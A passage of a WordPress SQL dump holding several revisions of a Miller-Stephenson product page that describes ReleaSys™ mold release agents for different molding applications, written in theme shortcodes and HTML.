width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 16:49:28', '2017-06-07 16:49:28', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4488, 2, '2017-06-07 16:50:08', '2017-06-07 16:50:08', '[button text="ADVANCED COMPOSITES"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER - SILICONE - ELASTOMER"]\n\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 16:50:08', '2017-06-07 16:50:08', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4489, 2, '2017-06-07 16:52:13', '2017-06-07 16:52:13', '[button text="ADVANCED COMPOSITES" target="ADVANCED COMPOSITES"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER - SILICONE - ELASTOMER"]\n\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 16:52:13', '2017-06-07 16:52:13', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4490, 2, '2017-06-07 16:52:59', '2017-06-07 16:52:59', '[button text="ADVANCED COMPOSITES" target="href=#"Advanced Composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER - SILICONE - ELASTOMER"]\r\n\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 16:52:59', '2017-06-07 16:52:59', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4491, 0, '2017-06-07 18:51:40', '2017-06-07 18:51:40', '', '', '', 'publish', 'closed', 'closed', '', '4491', '', '', '2017-06-07 18:51:40', '2017-06-07 18:51:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/4491/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4492, 0, '2017-06-07 19:12:05', '2017-06-07 19:12:05', '', '', '', 'publish', 'closed', 'closed', '', '4492', '', '', '2017-06-07 19:12:05', '2017-06-07 19:12:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/4492/', 0, 'nf_sub', '', 0); 
